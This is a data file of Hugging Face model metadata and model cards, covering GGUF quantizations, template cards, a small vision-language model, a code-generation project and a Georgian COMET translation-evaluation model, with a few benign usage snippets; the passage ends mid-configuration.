| Column | Type | Min | Max |
|---|---|---|---|
| modelId | string | 5 chars | 139 chars |
| author | string | 2 chars | 42 chars |
| last_modified | timestamp[us, tz=UTC] | 2020-02-15 11:33:14 | 2025-06-01 06:27:29 |
| downloads | int64 | 0 | 223M |
| likes | int64 | 0 | 11.7k |
| library_name | string (461 distinct values) | | |
| tags | sequence | 1 tag | 4.05k tags |
| pipeline_tag | string (54 distinct values) | | |
| createdAt | timestamp[us, tz=UTC] | 2022-03-02 23:29:04 | 2025-06-01 06:27:15 |
| card | string | 11 chars | 1.01M chars |
dougiefresh/jade_qwen3_4b_gguf
dougiefresh
2025-05-30T10:03:17Z
0
0
gguf
[ "gguf", "grammar", "logic", "rhetoric", "math", "programming", "aarch64", "c", "rust", "nushell", "text-generation", "en", "dataset:dougiefresh/grammar_logic_rhetoric_and_math", "dataset:dougiefresh/systems_programming_and_administration", "dataset:dougiefresh/systems_programming_code_conversations", "dataset:dougiefresh/jade_identity", "base_model:Qwen/Qwen3-4B", "base_model:quantized:Qwen/Qwen3-4B", "license:cc-by-nc-sa-4.0", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T09:55:30Z
--- license: cc-by-nc-sa-4.0 datasets: - dougiefresh/grammar_logic_rhetoric_and_math - dougiefresh/systems_programming_and_administration - dougiefresh/systems_programming_code_conversations - dougiefresh/jade_identity language: - en base_model: - Qwen/Qwen3-4B tags: - grammar - logic - rhetoric - math - programming - aarch64 - c - rust - nushell - gguf library_name: gguf pipeline_tag: text-generation --- # Jade Qwen 3 4B - GGUF versions A systems programming Qwen finetune. ![Jade](./Jade.jpeg) ## Model description Please view the model [description on the non-quantized version](https://huggingface.co/dougiefresh/jade_qwen3_4b).
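The card itself contains no usage code. A minimal sketch for running one of the GGUF files with llama-cpp-python is shown below; the quant filename glob is an assumption, so check the repository's file listing for the actual names.

```python
# Minimal sketch (assumes llama-cpp-python is installed and a Q4_K_M quant exists
# in the repo; the filename glob below is hypothetical).
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="dougiefresh/jade_qwen3_4b_gguf",
    filename="*q4_k_m.gguf",  # hypothetical pattern; pick a real file from the repo
    n_ctx=4096,
)

out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Write a Rust function that reverses a string."}]
)
print(out["choices"][0]["message"]["content"])
```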
hoan17/saving_P800s200x14d4_10
hoan17
2025-05-30T10:02:38Z
0
0
diffusers
[ "diffusers", "safetensors", "trl", "o2o", "reinforcement-learning", "text-to-image", "stable-diffusion", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionPipeline", "region:us" ]
text-to-image
2025-05-30T10:01:37Z
--- license: apache-2.0 tags: - trl - o2o - diffusers - reinforcement-learning - text-to-image - stable-diffusion --- # TRL O2O Model This is a diffusion model that has been fine-tuned with reinforcement learning to guide the model outputs according to a value function or human feedback. The model can be used for image generation conditioned on text.
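The card stops short of a usage snippet. Since the repository is tagged `diffusers:StableDiffusionPipeline`, a minimal sketch would look like the following; the prompt and dtype are illustrative.

```python
# Minimal sketch, assuming the repo loads as a standard StableDiffusionPipeline
# (as its `diffusers:StableDiffusionPipeline` tag indicates).
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained(
    "hoan17/saving_P800s200x14d4_10", torch_dtype=torch.float16
).to("cuda")

image = pipe("a watercolor painting of a lighthouse at dusk").images[0]
image.save("sample.png")
```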
rziga/mm_grounding_dino_base_all
rziga
2025-05-30T10:01:09Z
0
0
transformers
[ "transformers", "safetensors", "mm-grounding-dino", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:59:35Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
mradermacher/Refact-1_6B-fim-GGUF
mradermacher
2025-05-30T09:59:43Z
35
0
transformers
[ "transformers", "gguf", "code", "en", "dataset:bigcode/the-stack-dedup", "dataset:rombodawg/2XUNCENSORED_MegaCodeTraining188k", "dataset:bigcode/commitpackft", "base_model:refactai/Refact-1_6B-fim", "base_model:quantized:refactai/Refact-1_6B-fim", "license:bigscience-openrail-m", "endpoints_compatible", "region:us" ]
null
2025-03-11T02:23:57Z
--- base_model: refactai/Refact-1_6B-fim datasets: - bigcode/the-stack-dedup - rombodawg/2XUNCENSORED_MegaCodeTraining188k - bigcode/commitpackft language: - en library_name: transformers license: bigscience-openrail-m quantized_by: mradermacher tags: - code --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: --> static quants of https://huggingface.co/refactai/Refact-1_6B-fim <!-- provided-files --> weighted/imatrix quants are available at https://huggingface.co/mradermacher/Refact-1_6B-fim-i1-GGUF ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q2_K.gguf) | Q2_K | 0.7 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_S.gguf) | Q3_K_S | 0.8 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_L.gguf) | Q3_K_L | 1.0 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.IQ4_XS.gguf) | IQ4_XS | 1.0 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_S.gguf) | Q5_K_S | 1.2 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_M.gguf) | Q5_K_M | 1.2 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q6_K.gguf) | Q6_K | 1.4 | very good quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q8_0.gguf) | Q8_0 | 1.8 | fast, best quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.f16.gguf) | f16 | 3.3 | 16 bpw, overkill | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. <!-- end -->
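Beyond the CLI hints in the card, a minimal Python sketch for fetching and running one of the listed quants is shown below; llama-cpp-python is one possible runtime (an assumption, not the author's recommendation), and the filename is the Q4_K_M entry from the table above.

```python
# Minimal sketch: download the Q4_K_M quant listed above and load it with
# llama-cpp-python (assumption: llama-cpp-python is the chosen GGUF runtime).
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

path = hf_hub_download(
    repo_id="mradermacher/Refact-1_6B-fim-GGUF",
    filename="Refact-1_6B-fim.Q4_K_M.gguf",
)
llm = Llama(model_path=path, n_ctx=4096)

# Plain completion prompt; the base model is a fill-in-the-middle code model.
print(llm("def fibonacci(n):", max_tokens=64)["choices"][0]["text"])
```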
yfqiu-nlp/chameleon-world-model-aurora-bootstrap
yfqiu-nlp
2025-05-30T09:58:18Z
0
0
peft
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:leloy/Anole-7b-v0.1-hf", "base_model:adapter:leloy/Anole-7b-v0.1-hf", "region:us" ]
null
2025-05-30T09:55:36Z
--- base_model: leloy/Anole-7b-v0.1-hf library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.13.0
leobianco/npov_RM_google_S_130104_LLM_false_STRUCT_false_epochs_3_lr_1e-3_r_8_2505300948
leobianco
2025-05-30T09:54:12Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:48:56Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
rhinocamp/nanoVLM
rhinocamp
2025-05-30T09:53:23Z
1
0
nanovlm
[ "nanovlm", "safetensors", "vision-language", "multimodal", "research", "image-text-to-text", "license:mit", "region:us" ]
image-text-to-text
2025-05-27T22:02:47Z
--- # For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1 # Doc / guide: https://huggingface.co/docs/hub/model-cards library_name: nanovlm license: mit pipeline_tag: image-text-to-text tags: - vision-language - multimodal - research --- **nanoVLM** is a minimal and lightweight Vision-Language Model (VLM) designed for efficient training and experimentation. Built using pure PyTorch, the entire model architecture and training logic fits within ~750 lines of code. It combines a ViT-based image encoder (SigLIP-B/16-224-85M) with a lightweight causal language model (SmolLM2-135M), resulting in a compact 222M parameter model. For more information, check out the base model on https://huggingface.co/lusxvr/nanoVLM-222M. **Usage:** Clone the nanoVLM repository: https://github.com/huggingface/nanoVLM. Follow the install instructions and run the following code: ```python from models.vision_language_model import VisionLanguageModel model = VisionLanguageModel.from_pretrained("rhinocamp/nanoVLM") ```
kuuroo/zipee
kuuroo
2025-05-30T09:52:04Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-05-29T11:51:05Z
--- license: apache-2.0 ---
sanjudebnath/MiniCoderX
sanjudebnath
2025-05-30T09:51:04Z
0
0
null
[ "safetensors", "code-generation", "transformer", "ast", "cfg", "langchain", "ollama", "text-generation", "en", "dataset:the-stack", "dataset:codesearchnet", "dataset:humaneval", "dataset:mbpp", "dataset:bugs2fix", "dataset:java-python", "license:mit", "region:us" ]
text-generation
2025-04-20T15:56:01Z
--- language: - en license: mit tags: - code-generation - transformer - ast - cfg - langchain - ollama model_name: MiniCoderX datasets: - the-stack - codesearchnet - humaneval - mbpp - bugs2fix - java-python pipeline_tag: text-generation --- # 🚀 MiniCoderX: A Lightweight Transformer for Code Generation **MiniCoderX** is a structure-aware, transformer-based small language model (SLM) for code generation. It blends modern architectural techniques with efficient deployment using tools like **LangChain** and **Ollama**, making it ideal for rapid local experimentation. Link -> https://v0-mini-coder-x.vercel.app/ --- ## ✨ Features - 🧠 Transformer-based encoder-decoder (TinyCodeT5 / DistilGPT2) - 🌲 AST/CFG-aware encoding for code structure understanding - 💾 Syntax-constrained decoding using grammar rules and trees - 🔁 Multi-task heads: generation, summarization, translation, bug fixing - ⚙️ LangChain + Ollama integration for fast local deployment - 🧪 Evaluated on HumanEval, CodeXGLUE, MBPP --- ## 🏗️ Model Architecture | Component | Description | |----------------|-----------------------------------------------------------| | Base | Tiny encoder-decoder (MiniLM, DistilGPT2, TinyCodeT5) | | Structure-aware | AST and Control Flow Graph embeddings + positional masks | | Heads | Multi-task heads for flexible downstream use | | Decoder | Syntax-aware beam search (grammar constraints) | | Tokenizer | BPE or SentencePiece trained on code + comments | --- ## 🔧 Architectural Additions (SOTA Techniques) ### 🌲 AST/CFG Embeddings Enhances understanding of code structure by: - Adding AST node/edge embeddings to token inputs - Including path embeddings between syntactic elements - Graph-aware position encoding Inspired by: **StructCoder**, **AST-T5**, **Code4Struct** ### 💾 Syntax-Constrained Decoding Improves generation accuracy and reduces invalid code by: - Restricting token outputs using grammar constraints (BNF/PEG) - Custom decoding logic (e.g., Tree traversal) - Dynamic decoding masks based on token state Inspired by: **TreeGen**, **Code4Struct** ### 🔁 Multi-Task Learning Heads Supports multiple tasks: - Code generation (NL → Code) - Summarization (Code → NL) - Translation (Java ⇄ Python) - Code repair and completion Inspired by: **CodeT5+**, **CoTexT** --- ## ⚡ LangChain + Ollama Integration ### 💡 Why? 
To enable: - 🧪 Local testing and chaining of models via **LangChain** - 🦮 Fast prototyping with **Ollama** for custom transformer backends - 🔄 Easy switch between small local models and larger remote APIs ### 🔌 Integration Plan ```python from langchain.llms import Ollama from langchain.chains import LLMChain from langchain.prompts import PromptTemplate # Load MiniCoderX with Ollama llm = Ollama(model="minicoderx") # Local model via Ollama # Define code generation prompt prompt = PromptTemplate( input_variables=["instruction"], template="Generate Python code for the task: {instruction}", ) chain = LLMChain(llm=llm, prompt=prompt) result = chain.run("Sort a list of integers using quicksort") print(result) ``` > ✅ Ollama will be used to serve your fine-tuned SLM locally > ✅ LangChain will wrap it with prompts, chains, and memory features for interactivity --- ## 📦 Datasets | Dataset | Use | |----------------|----------------------------| | The Stack (subset) | Pretraining corpus | | CodeSearchNet | Summarization, Search | | HumanEval | Code generation benchmark | | MBPP | Python programming prompts | | Bugs2Fix | Code repair | | Java-Python | Cross-language translation | --- ## 🔬 Training Objectives - ✅ Span Masking (CodeT5-style) - ✅ Contrastive pretraining - ✅ Instruction tuning (natural prompt formatting) - ✅ Auto-regressive generation --- ## 📊 Evaluation Benchmarks | Benchmark | Metric | |------------|-------------------| | HumanEval | Pass@1, BLEU | | MBPP | Accuracy | | CodeXGLUE | CodeBLEU, EM | | Unit Tests | Pass Rate | --- ## 🧪 Project Roadmap ### ✅ Phase 1: MVP Model - Train TinyCodeT5 model with span masking - Evaluate on MBPP and HumanEval-lite - Serve via Ollama + LangChain prompt chain ### 🔁 Phase 2: Structural Learning - Add AST/CFG encodings - Introduce grammar-constrained decoding - Multi-task training (gen, sum, repair) ### 📦 Phase 3: Optimization & Packaging - Distill from larger model (e.g., StarCoder) - Add reinforcement fine-tuning via test cases - Export to Hugging Face + Ollama integration --- ## 🛠️ Tools & Frameworks - [Hugging Face Transformers](https://github.com/huggingface/transformers) - [LangChain](https://github.com/langchain-ai/langchain) - [Ollama](https://ollama.com/) - SentencePiece / BPE - NetworkX for AST/CFG parsing --- ## 🤝 Contributing Want to help with grammar decoders, AST integration, or evaluation? PRs welcome! --- ## 📜 License MIT License. Built for research and open experimentation. --- ## 📧 Contact Drop an issue or discussion on GitHub!
Darsala/georgian_comet
Darsala
2025-05-30T09:50:30Z
0
0
comet
[ "comet", "translation", "evaluation", "mt-evaluation", "georgian", "ka", "en", "dataset:Darsala/georgian_metric_evaluation", "base_model:Unbabel/wmt22-comet-da", "base_model:finetune:Unbabel/wmt22-comet-da", "license:apache-2.0", "model-index", "region:us" ]
translation
2025-05-29T13:46:03Z
--- language: - ka - en license: apache-2.0 tags: - translation - evaluation - comet - mt-evaluation - georgian metrics: - kendall_tau - spearman_correlation - pearson_correlation model-index: - name: Georgian-COMET results: - task: type: translation-evaluation name: Machine Translation Evaluation dataset: name: Georgian MT Evaluation Dataset type: Darsala/georgian_metric_evaluation metrics: - type: pearson_correlation value: 0.878 name: Pearson Correlation - type: spearman_correlation value: 0.796 name: Spearman Correlation - type: kendall_tau value: 0.603 name: Kendall's Tau base_model: Unbabel/wmt22-comet-da datasets: - Darsala/georgian_metric_evaluation --- # Georgian-COMET: Fine-tuned COMET for English-Georgian MT Evaluation This is a [COMET](https://github.com/Unbabel/COMET) evaluation model fine-tuned specifically for English-Georgian machine translation evaluation. It receives a triplet with (source sentence, translation, reference translation) and returns a score that reflects the quality of the translation compared to both source and reference. ## Model Description Georgian-COMET is a fine-tuned version of [Unbabel/wmt22-comet-da](https://huggingface.co/Unbabel/wmt22-comet-da) that has been optimized for evaluating English-to-Georgian translations through knowledge distillation from Claude Sonnet 4. The model shows significant improvements over the base model when evaluating Georgian translations. ### Key Improvements over Base Model | Metric | Base COMET | Georgian-COMET | Improvement | |--------|------------|----------------|-------------| | Pearson | 0.867 | **0.878** | +1.1% | | Spearman | 0.759 | **0.796** | +3.7% | | Kendall | 0.564 | **0.603** | +3.9% | ## Paper - **Base Model Paper**: [COMET-22: Unbabel-IST 2022 Submission for the Metrics Shared Task](https://aclanthology.org/2022.wmt-1.52) (Rei et al., WMT 2022) - **This Model**: Paper coming soon ## Repository [https://github.com/LukaDarsalia/nmt_metrics_research](https://github.com/LukaDarsalia/nmt_metrics_research) ## License Apache-2.0 ## Usage (unbabel-comet) Using this model requires unbabel-comet to be installed: ```bash pip install --upgrade pip # ensures that pip is current pip install unbabel-comet ``` ### Option 1: Direct Download from HuggingFace ```python from comet import load_from_checkpoint import requests import os # Download the model checkpoint model_url = "https://huggingface.co/Darsala/georgian_comet/resolve/main/model.ckpt" model_path = "georgian_comet.ckpt" # Download if not already present if not os.path.exists(model_path): response = requests.get(model_url) with open(model_path, 'wb') as f: f.write(response.content) # Load the model model = load_from_checkpoint(model_path) # Prepare your data data = [ { "src": "The cat sat on the mat.", "mt": "კატა ზის ხალიჩაზე.", "ref": "კატა იჯდა ხალიჩაზე." }, { "src": "Schools and kindergartens were opened.", "mt": "სკოლები და საბავშვო ბაღები გაიხსნა.", "ref": "გაიხსნა სკოლები და საბავშვო ბაღები." 
} ] # Get predictions model_output = model.predict(data, batch_size=8, gpus=1) print(model_output) ``` ### Option 2: Using comet CLI First download the model checkpoint: ```bash wget https://huggingface.co/Darsala/georgian_comet/resolve/main/model.ckpt -O georgian_comet.ckpt ``` Then use it with comet CLI: ```bash comet-score -s {source-inputs}.txt -t {translation-outputs}.txt -r {references}.txt --model georgian_comet.ckpt ``` ### Option 3: Integration with Evaluation Pipeline ```python from comet import load_from_checkpoint import pandas as pd # Load model model = load_from_checkpoint("georgian_comet.ckpt") # Load your evaluation data df = pd.read_csv("your_evaluation_data.csv") # Prepare data in COMET format data = [ { "src": row["sourceText"], "mt": row["targetText"], "ref": row["referenceText"] } for _, row in df.iterrows() ] # Get scores scores = model.predict(data, batch_size=16) print(f"Average score: {sum(scores['scores']) / len(scores['scores']):.3f}") ``` ## Intended Uses This model is intended to be used for **English-Georgian MT evaluation**. Given a triplet with (source sentence in English, translation in Georgian, reference translation in Georgian), it outputs a single score between 0 and 1 where 1 represents a perfect translation. ### Primary Use Cases 1. **MT System Development**: Evaluate and compare different English-Georgian MT systems 2. **Quality Assurance**: Automated quality checks for Georgian translations 3. **Research**: Study MT evaluation for morphologically rich languages like Georgian 4. **Production Monitoring**: Track translation quality in production environments ### Out-of-Scope Use - **Other Language Pairs**: This model is specifically fine-tuned for English-Georgian and may not perform well on other language pairs - **Reference-Free Evaluation**: The model requires reference translations - **Document-Level**: Optimized for sentence-level evaluation ## Training Details ### Training Data - **Dataset**: 5,000 English-Georgian pairs from [corp.dict.ge](https://corp.dict.ge/) - **MT Systems**: Translations from SMaLL-100, Google Translate, and Ucraft Translate - **Scoring Method**: Knowledge distillation from Claude Sonnet 4 with added Gaussian noise (σ=3) - **Details**: See [Darsala/georgian_metric_evaluation](https://huggingface.co/datasets/Darsala/georgian_metric_evaluation) ### Training Configuration ```yaml regression_metric: init_args: nr_frozen_epochs: 0.3 keep_embeddings_frozen: True optimizer: AdamW encoder_learning_rate: 1.5e-05 learning_rate: 1.5e-05 loss: 